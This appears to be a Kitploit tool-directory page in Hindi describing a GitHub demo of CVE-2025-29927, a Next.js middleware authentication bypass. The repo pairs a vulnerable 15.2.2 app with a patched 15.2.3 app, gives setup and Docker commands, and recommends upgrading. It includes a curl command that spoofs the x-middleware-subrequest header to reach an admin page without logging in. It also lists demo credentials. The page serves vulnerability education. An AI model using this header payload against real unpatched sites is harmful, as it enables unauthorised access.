Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-29927 — Next.js CVE-2025-29927 प्रदर्शन | Kitploit
उपकरण/GitHubGitHub/dante01yoon/cve-2025-29927
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणवेब सुरक्षाप्रमाणीकरणगलत कॉन्फ़िगरेशनलर्निंग और शिक्षा
GitHubdante01yoon/cve-2025-29927

CVE-2025-29927

Next.js CVE-2025-29927 प्रदर्शन

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Next.js भेद्यता डेमो (CVE-2025-29927)

यह रिपॉजिटरी Next.js भेद्यता CVE-2025-29927 का प्रदर्शन है, जो Next.js संस्करण 15.2.2 और उससे पहले के संस्करणों को प्रभावित करती है। यह भेद्यता हमलावरों को x-middleware-subrequest हेडर सेट करके मिडलवेयर प्रमाणीकरण जांच को बायपास करने की अनुमति देती है।

रिपॉजिटरी संरचना

यह एक NX मोनोरिपो है जिसमें दो Next.js एप्लिकेशन हैं:

  1. vulnerable-app: भेद्यता के साथ Next.js 15.2.2 का उपयोग करता है
  2. fixed-app: फिक्स लागू करने वाला Next.js 15.2.3 का उपयोग करता है

भेद्यता स्पष्टीकरण

Next.js के 15.2.3 से पहले के संस्करणों में, मिडलवेयर कार्यान्वयन में एक सुरक्षा भेद्यता है। मिडलवेयर x-middleware-subrequest हेडर के मूल को ठीक से मान्य नहीं करता है, जिससे हमलावर इस हेडर को स्पूफ कर सकते हैं और मिडलवेयर-आधारित प्रमाणीकरण जांच को बायपास कर सकते हैं।

डेमो कैसे चलाएं

पूर्वापेक्षाएँ

  • Node.js 18 या बाद का संस्करण
  • npm या yarn
  • Docker (वैकल्पिक, कंटेनरीकृत परिनियोजन के लिए)

भेद्य एप्लिकेशन चलाना

root@kitploit:~
# Navigate to the repository
cd nextjs-vulnerability

# Install dependencies for the vulnerable app
cd apps/vulnerable-app
npm install

# Start the vulnerable app
npm run dev

भेद्य एप्लिकेशन http://localhost:3000 पर उपलब्ध होगा।

फिक्स्ड एप्लिकेशन चलाना

root@kitploit:~
# Navigate to the repository
cd nextjs-vulnerability

# Install dependencies for the fixed app
cd apps/fixed-app
npm install

# Start the fixed app
npm run dev

फिक्स्ड एप्लिकेशन http://localhost:3001 पर उपलब्ध होगा।

Docker का उपयोग करना

आप Docker का उपयोग करके भी एप्लिकेशन चला सकते हैं:

root@kitploit:~
# For the vulnerable app
cd apps/vulnerable-app
docker build -t nextjs-vulnerable .
docker run -p 3000:3000 nextjs-vulnerable

# For the fixed app
cd apps/fixed-app
docker build -t nextjs-fixed .
docker run -p 3001:3000 nextjs-fixed

भेद्यता का प्रदर्शन

  1. भेद्य एप्लिकेशन खोलें (http://localhost:3000)
  2. नेविगेशन बार में "Admin" पर क्लिक करें
  3. आप लॉगिन पेज पर रीडायरेक्ट हो जाएंगे क्योंकि आप प्रमाणित नहीं हैं
  4. अब भेद्यता के साथ सीधे एडमिन पेज तक पहुंचने का प्रयास करें:
root@kitploit:~
# Using curl
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin

# Or use a browser extension like ModHeader to add the header
# and then visit http://localhost:3000/admin

भेद्य संस्करण (15.2.2) के साथ, आप x-middleware-subrequest हेडर जोड़कर बिना प्रमाणीकरण के एडमिन पेज तक पहुंच सकेंगे।

फिक्स्ड संस्करण (15.2.3) के साथ, मिडलवेयर इस हेडर के मूल को सही ढंग से मान्य करता है, और आप अभी भी लॉगिन पेज पर रीडायरेक्ट होंगे।

लॉगिन क्रेडेंशियल्स

डेमो उद्देश्यों के लिए, आप इनके साथ लॉग इन कर सकते हैं:

  • उपयोगकर्ता नाम: admin
  • पासवर्ड: password123

सुरक्षा अनुशंसा

यदि आप प्रोडक्शन में Next.js का उपयोग कर रहे हैं, तो इस भेद्यता से बचाव के लिए संस्करण 15.2.3 या उससे बाद के संस्करण में अपडेट करना सुनिश्चित करें।

टूल डाउनलोड करें